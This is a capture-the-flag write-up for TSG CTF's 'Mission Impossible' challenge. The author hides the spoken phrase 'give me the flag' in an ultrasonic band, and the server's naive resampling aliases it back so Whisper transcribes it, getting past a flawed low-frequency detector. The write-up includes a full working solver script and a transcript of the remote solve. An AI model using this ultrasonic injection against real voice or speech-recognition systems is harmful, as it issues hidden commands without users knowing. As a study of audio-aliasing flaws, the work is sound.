![[Pasted image 20251221024008.png]]
//TSG CTF – Mission Impossible (MISC)
Remote: http://35.194.98.181:57860/
Flag format: TSGCTF{...}
>TL;DR
-
The service runs Whisper speech-to-text, but it also has a broken “intruder detector” that triggers on any non-zero energy below 10kHz.
-
The key bug: it checks
magnitude > 0after cutting high-frequencies, so any low-frequency residue triggersALERT!. -
Solution: craft an audio signal with all energy above 10kHz (so detector sees exactly 0), but which still becomes intelligible to Whisper after the server’s naive linear resampling (
res_type="linear") from a higher sample rate to 16kHz. -
This is done by placing a speech signal in an ultrasonic band (single-sideband modulation), relying on aliasing during the downsample to fold it back into the speech band.
Final flag:
TSGCTF{Th1S_fl4g_wiLL_s3lf-deSTrucT_in_5_s3c0nds}
>1) Local analysis
1.1 Files
The attachment is a tiny tarball containing a Dockerized Gradio app.
Terminal transcript (local) (from local_analysis.log):
$ ls -la
(total listing omitted)
$ file -b mission_impossible.tar.gz
gzip compressed data, from Unix, original size modulo 2^32 10240
$ tar -xzvf mission_impossible.tar.gz -C extracted
mission_impossible/
mission_impossible/Dockerfile
mission_impossible/src/
mission_impossible/src/server.py
1.2 Reading the server
The core logic is in extracted/mission_impossible/src/server.py.
Key parts (verbatim):
def detect_intruder(freq_space, sr):
cut_high_freqs(freq_space, sr, 10000)
magnitude = np.abs(freq_space).max()
return magnitude > 0
...
freq_space = librosa.stft(wave, n_fft=N_FFT)
freq_space[np.abs(freq_space) < 0.01] = 0
wave = librosa.istft(freq_space)
if detect_intruder(freq_space, sr):
return "ALERT! Intruder detected!"
wave = librosa.resample(wave, orig_sr=sr, target_sr=WHISPER_SR, res_type="linear")
result = whisper.transcribe(model, wave, temperature=0.0)["text"]
if "give me the flag" in result.lower():
return "OK, here is the flag: " + FLAG
1.3 What the bug means
-
detect_intruder()cuts high frequencies (everything above 10kHz), then computesmagnitude = max(abs(freq_space)). -
It returns
magnitude > 0.
So the detector triggers if there is any non-zero STFT bin below 10kHz.
Because they already did a “noise cancellation” step:
freq_space[np.abs(freq_space) < 0.01] = 0
…we can aim to make all STFT bins under 10kHz exactly zero (after their thresholding), so magnitude == 0 and the detector does not fire.
1.4 Why “ultrasonic + aliasing” is the right idea
At first this sounds impossible: if we remove everything below 10kHz, Whisper can’t hear the phrase, right?
But note the order:
-
They compute STFT and threshold it.
-
They inverse-STFT back to
wave. -
They call
detect_intruder(freq_space, sr)on the frequency domain copy. -
If safe, they resample the time-domain
waveto 16kHz usingres_type="linear".
So:
-
We only need to ensure the STFT bins below 10kHz are 0 to bypass the detector.
-
The time-domain wave is still used for Whisper. If that wave contains ultrasonic information, and the resampling is naive, it can alias into the audible range.
This is a classic signal-processing pitfall:
- Downsampling without a proper anti-alias low-pass filter folds high-frequency content into low frequencies.
That gave the core exploitation idea:
Encode the command phrase into an ultrasonic band (>10kHz). The detector sees 0 (because it removes those bins). Then the server’s naive resampling folds (aliases) that ultrasonic band back into the speech band, and Whisper transcribes it.
>2) Building the exploit locally
2.1 Tooling
I needed:
-
espeak-ngto synthesize “give me the flag” reproducibly -
python libs for signal processing (
numpy,scipy,soundfile,librosa)
(Installed in this environment with apt/pip.)
2.2 How the payload is constructed
Steps:
-
Synthesize a clean baseband speech waveform (
WHISPER_SR=16000). -
Low-pass it (≈4kHz) so it fits nicely inside a modulation bandwidth.
-
Upsample to 48kHz.
-
Perform single-sideband modulation (SSB) via the analytic signal (Hilbert transform):
[
x_{ssb}(t) = \Re{ (x(t) + j \hat{x}(t)) e^{j 2\pi f_c t} }
]
This shifts the speech spectrum up near a carrier frequency f_c (default ~16kHz).
-
Apply a strong high-pass filter (e.g. 13kHz) so any residual energy below 10kHz is eliminated.
-
Save as a standard PCM16 WAV.
2.3 Local verification (important)
Before even touching the remote, the solver emulates the server’s detection logic:
-
STFT (n_fft=400)
-
threshold bins < 0.01 to zero
-
cut frequencies above 10kHz and check magnitude
If the check returns exactly 0.0, we know the detector will not trigger.
>3) Remote exploitation
3.1 API discovery
The UI is Gradio, and it exposes endpoints under the prefix shown in /config:
api_prefix = /gradio_api
The reliable way (works even when gradio_client API-metadata is flaky) is to use:
-
POST /gradio_api/uploadto upload the WAV -
POST /gradio_api/run/predictwith aFileDataobject referencing the uploaded server path
The solver does exactly this using httpx.
3.2 Successful remote run
Terminal transcript (remote) (from remote_run.log):
$ python3 solve_mission_impossible.py \
--out attack2.wav \
--mode ssb \
--repeat 8 \
--hp 13000 \
--remote http://35.194.98.181:57860/
[+] Wrote: /home/noigel/CTF/tsg/MISC/Mission_Impossible/attack2.wav
[+] Intruder magnitude after cut (should be 0.0): 0.0
[+] Alias self-corr sanity (higher is better): 0.9999
[+] Attack RMS: 0.104154
[+] Aliased (LP) RMS: 0.073874
[+] Remote response:
OK, here is the flag: TSGCTF{Th1S_fl4g_wiLL_s3lf-deSTrucT_in_5_s3c0nds}
>4) Full solver code
File: solve_mission_impossible.py
#!/usr/bin/env python3
import argparse
import math
import os
import subprocess
import tempfile
from dataclasses import dataclass
from pathlib import Path
import numpy as np
import soundfile as sf
from scipy.signal import butter, filtfilt, hilbert
import librosa
def remote_run_predict(remote: str, wav_path: Path, timeout_s: float = 120.0) -> str:
"""Run the remote Gradio app via HTTP endpoints.
Uses:
- POST /gradio_api/upload
- POST /gradio_api/run/predict
"""
import httpx
base = remote.rstrip("/")
upload_url = f"{base}/gradio_api/upload"
run_url = f"{base}/gradio_api/run/predict"
with httpx.Client(timeout=timeout_s) as client:
with wav_path.open("rb") as f:
files = {"files": (wav_path.name, f, "audio/wav")}
r = client.post(upload_url, files=files)
r.raise_for_status()
uploaded_path = r.json()[0]
payload = {
"data": [
{
"path": uploaded_path,
"meta": {"_type": "gradio.FileData"},
}
]
}
rr = client.post(run_url, json=payload)
rr.raise_for_status()
j = rr.json()
return j.get("data", [""])[0]
N_FFT = 400
MAX_DURATION = 5
WHISPER_SR = 16000
@dataclass
class LocalCheckResult:
intruder_magnitude_after_cut: float
corr_base_vs_aliased: float
base_rms: float
attack_rms: float
def linear_resample(wave: np.ndarray, orig_sr: int, target_sr: int) -> np.ndarray:
"""Resample via linear interpolation (intentionally naive, to match the service)."""
if orig_sr == target_sr:
return wave.astype(np.float32, copy=False)
if wave.ndim != 1:
raise ValueError("linear_resample expects mono audio")
if orig_sr <= 0 or target_sr <= 0:
raise ValueError("Invalid sample rates")
ratio = target_sr / float(orig_sr)
out_len = max(1, int(round(len(wave) * ratio)))
x_old = np.arange(len(wave), dtype=np.float32)
x_new = np.linspace(0.0, float(len(wave) - 1), out_len, dtype=np.float32)
return np.interp(x_new, x_old, wave.astype(np.float32, copy=False)).astype(np.float32, copy=False)
def _butter_filter(wave: np.ndarray, sr: int, kind: str, cutoff_hz: float, order: int = 6) -> np.ndarray:
nyq = 0.5 * sr
if cutoff_hz <= 0 or cutoff_hz >= nyq:
raise ValueError(f"cutoff_hz must be within (0, {nyq})")
w = cutoff_hz / nyq
b, a = butter(order, w, btype=kind)
return filtfilt(b, a, wave).astype(np.float32, copy=False)
def synthesize_phrase_espeak(phrase: str, out_wav: Path, sr: int = WHISPER_SR) -> None:
out_wav.parent.mkdir(parents=True, exist_ok=True)
cmd = [
"espeak-ng",
"-v",
"en-us",
"-s",
"150",
"-w",
str(out_wav),
phrase,
]
subprocess.check_call(cmd)
# espeak-ng chooses its own SR; normalize to requested.
wave, in_sr = sf.read(out_wav, dtype="float32")
if wave.ndim == 2:
wave = wave.mean(axis=1)
if in_sr != sr:
wave = librosa.resample(wave, orig_sr=in_sr, target_sr=sr, res_type="kaiser_best")
sf.write(out_wav, wave, sr)
def make_ultrasonic_attack(
base_wave: np.ndarray,
base_sr: int,
attack_sr: int = 48000,
base_lowpass_hz: float = 4000.0,
carrier_hz: float = 16000.0,
safety_highpass_hz: float = 10500.0,
mode: str = "ssb",
) -> np.ndarray:
if base_wave.ndim != 1:
raise ValueError("base_wave must be mono")
if base_sr <= 0 or attack_sr <= 0:
raise ValueError("Invalid sample rates")
# Trim to the service’s max duration.
base_wave = base_wave[: int(MAX_DURATION * base_sr)].astype(np.float32, copy=False)
# Band-limit so that, once shifted, everything stays above the 10k cutoff.
base_wave = _butter_filter(base_wave, base_sr, "lowpass", base_lowpass_hz)
# Upsample to a higher SR so we can place content in >10k.
if base_sr != attack_sr:
up = librosa.resample(base_wave, orig_sr=base_sr, target_sr=attack_sr, res_type="kaiser_best")
else:
up = base_wave
t = np.arange(len(up), dtype=np.float32) / float(attack_sr)
if mode == "ssb":
# Single-sideband modulation via analytic signal to avoid creating a low-frequency image.
analytic = hilbert(up).astype(np.complex64, copy=False)
shifted = np.real(analytic * np.exp(1j * (2.0 * math.pi * carrier_hz) * t)).astype(np.float32)
elif mode == "am":
# AM modulation: creates symmetric sidebands around the carrier.
carrier = np.cos((2.0 * math.pi * carrier_hz) * t).astype(np.float32)
# Add a small bias so the envelope survives thresholding better.
shifted = ((0.75 * up + 0.25) * carrier).astype(np.float32)
else:
raise ValueError("mode must be 'ssb' or 'am'")
# Extra safety: remove any residual energy below cutoff.
shifted = _butter_filter(shifted, attack_sr, "highpass", safety_highpass_hz)
# Normalize.
peak = float(np.max(np.abs(shifted)) + 1e-9)
shifted = (0.95 * shifted / peak).astype(np.float32)
return shifted
def server_like_local_check(attack_wave: np.ndarray, sr: int) -> LocalCheckResult:
# Emulate key parts of server.py without Whisper.
wave = attack_wave[: int(MAX_DURATION * sr)].astype(np.float32, copy=False)
# Server STFT + threshold.
freq_space = librosa.stft(wave, n_fft=N_FFT)
freq_space[np.abs(freq_space) < 0.01] = 0
denoised = librosa.istft(freq_space)
# detect_intruder: cut high freqs then magnitude check.
cutoff_bin = int(10000 * N_FFT / sr)
freq_cut = freq_space.copy()
if cutoff_bin < freq_cut.shape[0]:
freq_cut[cutoff_bin:, :] = 0
magnitude = float(np.abs(freq_cut).max())
aliased = linear_resample(denoised.astype(np.float32, copy=False), orig_sr=sr, target_sr=WHISPER_SR)
# Compare against an expected “baseband” reconstruction: the aliasing should recover speech-ish content.
# We use self-correlation proxy by comparing aliased to its own lowpassed version (gives a sanity signal).
aliased_lp = _butter_filter(aliased.astype(np.float32), WHISPER_SR, "lowpass", 4000.0)
n = min(len(aliased), len(aliased_lp))
a = aliased[:n]
b = aliased_lp[:n]
denom = float(np.linalg.norm(a) * np.linalg.norm(b) + 1e-9)
corr = float(np.dot(a, b) / denom)
return LocalCheckResult(
intruder_magnitude_after_cut=magnitude,
corr_base_vs_aliased=corr,
base_rms=float(np.sqrt(np.mean(aliased_lp**2) + 1e-12)),
attack_rms=float(np.sqrt(np.mean(wave**2) + 1e-12)),
)
def write_int16_wav(path: Path, wave: np.ndarray, sr: int) -> None:
path.parent.mkdir(parents=True, exist_ok=True)
wave = np.clip(wave, -1.0, 1.0)
sf.write(path, (wave * 32767.0).astype(np.int16), sr, subtype="PCM_16")
def main() -> int:
ap = argparse.ArgumentParser(description="TSGCTF Mission Impossible solver (local-first).")
ap.add_argument("--out", default="attack.wav", help="Output attack WAV file")
ap.add_argument("--phrase", default="give me the flag", help="Command phrase")
ap.add_argument("--attack-sr", type=int, default=48000, help="Attack WAV sample rate")
ap.add_argument("--carrier", type=float, default=16000.0, help="Carrier frequency (Hz)")
ap.add_argument("--hp", type=float, default=10500.0, help="High-pass cutoff (Hz) to keep energy >10k")
ap.add_argument("--mode", choices=["ssb", "am"], default="ssb", help="Ultrasonic modulation mode")
ap.add_argument("--repeat", type=int, default=3, help="Repeat phrase N times for better recognition")
ap.add_argument("--remote", default=None, help="Remote Gradio URL (optional)")
ap.add_argument("--remote-timeout", type=float, default=180.0, help="Remote request timeout in seconds")
args = ap.parse_args()
out_path = Path(args.out).resolve()
with tempfile.TemporaryDirectory() as td:
base_wav = Path(td) / "base.wav"
phrase = (" ".join([args.phrase] * max(1, int(args.repeat)))).strip()
synthesize_phrase_espeak(phrase, base_wav, sr=WHISPER_SR)
base_wave, base_sr = sf.read(base_wav, dtype="float32")
if base_wave.ndim == 2:
base_wave = base_wave.mean(axis=1)
base_wave = base_wave.astype(np.float32, copy=False)
attack = make_ultrasonic_attack(
base_wave,
base_sr,
attack_sr=args.attack_sr,
carrier_hz=args.carrier,
safety_highpass_hz=args.hp,
mode=args.mode,
)
write_int16_wav(out_path, attack, args.attack_sr)
check = server_like_local_check(attack, args.attack_sr)
print("[+] Wrote:", out_path)
print("[+] Intruder magnitude after cut (should be 0.0):", check.intruder_magnitude_after_cut)
print("[+] Alias self-corr sanity (higher is better):", f"{check.corr_base_vs_aliased:.4f}")
print("[+] Attack RMS:", f"{check.attack_rms:.6f}")
print("[+] Aliased (LP) RMS:", f"{check.base_rms:.6f}")
if args.remote:
msg = remote_run_predict(args.remote, out_path, timeout_s=float(args.remote_timeout))
print("[+] Remote response:")
print(msg)
return 0
if __name__ == "__main__":
raise SystemExit(main())
>5) References / concepts used
These are the ideas this challenge relies on (and what I used to reason about it):
- Nyquist–Shannon sampling theorem and aliasing (downsampling without proper anti-alias filtering):
- https://en.wikipedia.org/wiki/Nyquist%E2%80%93Shannon_sampling_theorem
- https://en.wikipedia.org/wiki/Aliasing
- Hilbert transform / analytic signal (to build single-sideband modulation):
- https://en.wikipedia.org/wiki/Hilbert_transform
- https://en.wikipedia.org/wiki/Single-sideband_modulation
- Gradio HTTP API endpoints (conceptually; the exact endpoints were confirmed from
/configand/gradio_api/openapi.json):
>6) Notes / troubleshooting
-
If you get
ALERT! Intruder detected!, your payload still has non-zero energy below 10kHz after their STFT thresholding. Increase--hp(e.g.13000) and keep the signal normalized. -
If you get
Unknown command., Whisper didn’t recognize the phrase. Increase--repeat(I used 8) or try a different carrier.
>7) Reproduction checklist
From this folder:
# Local-only generation + detector check
python3 solve_mission_impossible.py --out attack2.wav --mode ssb --repeat 8 --hp 13000
# Remote solve (prints flag)
python3 solve_mission_impossible.py --out attack2.wav --mode ssb --repeat 8 --hp 13000 --remote http://35.194.98.181:57860/